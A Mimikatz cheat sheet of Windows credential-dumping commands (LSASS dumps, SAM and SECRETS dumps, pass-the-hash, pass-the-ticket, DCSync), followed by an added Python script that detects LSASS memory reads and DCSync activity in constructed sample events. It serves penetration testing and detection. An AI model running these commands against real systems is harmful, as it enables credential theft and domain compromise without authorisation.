Mimikatz

  • Mimikatz can extract hashes from the memory of the lsass.exe process, where the hashes are cached.

  • Upload the Mimikatz executable into a meterpreter session:

upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe

  • Commands

- Dump LSASS:
privilege::debug
token::elevate
sekurlsa::logonpasswords

- (Over) Pass The Hash
privilege::debug
sekurlsa::pth /user:<UserName> /ntlm:<NTLMHash> /domain:<DomainFQDN>

- List all available kerberos tickets in memory
sekurlsa::tickets

- Dump local Terminal Services credentials
sekurlsa::tspkg

- Dump and save LSASS in a file
sekurlsa::minidump c:\temp\lsass.dmp

- List cached MasterKeys
sekurlsa::dpapi

- List local Kerberos AES Keys
sekurlsa::ekeys

- Dump SAM Database
lsadump::sam

- Dump SECRETS Database
lsadump::secrets

- Inject and dump the Domain Controller's Credentials
privilege::debug
token::elevate
lsadump::lsa /inject

- Dump the Domain's Credentials remotely, without touching the DC's LSASS
lsadump::dcsync /domain:<DomainFQDN> /all

- List and Dump local kerberos credentials
kerberos::list /dump

- Pass The Ticket
kerberos::ptt <PathToKirbiFile>

- List TS/RDP sessions
ts::sessions

- List Vault credentials
vault::list
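Two of the techniques listed above leave characteristic telemetry that a defender can alert on: any sekurlsa::* or minidump use opens lsass.exe with a memory-read access mask (Sysmon Event ID 10, ProcessAccess), and lsadump::dcsync exercises directory-replication control-access rights (Windows Security Event ID 4662). The following is an added detection example, not part of the original cheat sheet and not Mimikatz code; it runs over constructed sample events in a simplified key=value form (real Sysmon/Security logs are XML/EVTX), and the LSASS-reader allowlist is an assumption to be tuned per environment.

```python
import re
from typing import Dict, List, Tuple

# Parser for the constructed key=value sample format used below (not Sysmon/EVTX XML).
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key=value event line into a dict; quoted values may contain spaces."""
    return {key: value.strip('"') for key, value in FIELD_RE.findall(line)}


# Sysmon Event ID 10 (ProcessAccess): reading LSASS memory requires PROCESS_VM_READ.
# The masks credential-dumping tooling typically requests (0x1010, 0x1038, 0x1FFFFF)
# all contain this bit; a benign query such as 0x1000 (QUERY_LIMITED_INFORMATION) does not.
PROCESS_VM_READ = 0x0010

# Assumption: per-environment allowlist of legitimate LSASS readers (EDR/AV), tuned locally.
LSASS_ACCESS_ALLOWLIST = {
    r"c:\program files\windows defender\msmpeng.exe",
}

# Security Event ID 4662: control-access rights that permit directory replication (DCSync).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}


def is_lsass_memory_read(ev: Dict[str, str]) -> bool:
    """True for a non-allowlisted process opening lsass.exe with a VM_READ-capable mask."""
    if ev.get("EventID") != "10":
        return False
    if not ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return False
    if ev.get("SourceImage", "").lower() in LSASS_ACCESS_ALLOWLIST:
        return False
    granted = int(ev.get("GrantedAccess", "0"), 16)
    return bool(granted & PROCESS_VM_READ)


def is_dcsync_like(ev: Dict[str, str]) -> bool:
    """True when a non-machine account exercises a replication right on the directory.

    Domain controllers replicate using their computer accounts (names ending in '$');
    a user account doing the same is the DCSync pattern. Caveat: directory
    synchronisation service accounts legitimately hold these rights and need their
    own allowlist in production.
    """
    if ev.get("EventID") != "4662":
        return False
    props = ev.get("Properties", "").lower()
    if not any(guid in props for guid in REPLICATION_GUIDS):
        return False
    return not ev.get("SubjectUserName", "").endswith("$")


def triage(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (rule, actor) pairs for every event that matches a rule."""
    alerts: List[Tuple[str, str]] = []
    for line in lines:
        ev = parse_event(line)
        if is_lsass_memory_read(ev):
            alerts.append(("lsass_memory_read", ev["SourceImage"]))
        elif is_dcsync_like(ev):
            alerts.append(("dcsync", ev["SubjectUserName"]))
    return alerts


# Constructed sample events (not real telemetry); paths and account names are invented.
SAMPLE_EVENTS = [
    r'EventID=10 SourceImage="C:\Windows\Temp\m.exe" TargetImage="C:\Windows\System32\lsass.exe" GrantedAccess=0x1010',
    r'EventID=10 SourceImage="C:\Program Files\Windows Defender\MsMpEng.exe" TargetImage="C:\Windows\System32\lsass.exe" GrantedAccess=0x1FFFFF',
    r'EventID=10 SourceImage="C:\Windows\System32\svchost.exe" TargetImage="C:\Windows\System32\lsass.exe" GrantedAccess=0x1000',
    r'EventID=4662 SubjectUserName=DC01$ ObjectType=domainDNS Properties="{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}" AccessMask=0x100',
    r'EventID=4662 SubjectUserName=jdoe ObjectType=domainDNS Properties="{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}" AccessMask=0x100',
    r'EventID=4662 SubjectUserName=jdoe ObjectType=user Properties="{00000000-0000-0000-0000-000000000000}" AccessMask=0x10',
]

if __name__ == "__main__":
    for rule, actor in triage(SAMPLE_EVENTS):
        print(f"ALERT {rule}: {actor}")
```

Running it flags only the first and fifth sample events: the allowlisted AV engine and the 0x1000 query are not memory reads, the DC01$ replication is normal inter-DC traffic, and the last 4662 carries no replication right. The access-mask check on the PROCESS_VM_READ bit is deliberately broader than matching the exact 0x1010 mask, since dumping tools vary the mask they request; the cost is that the allowlist has to carry every legitimate reader. Pass-the-hash and pass-the-ticket from the list above are not covered here; they surface as logon and ticket-request anomalies rather than process-access or replication events.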
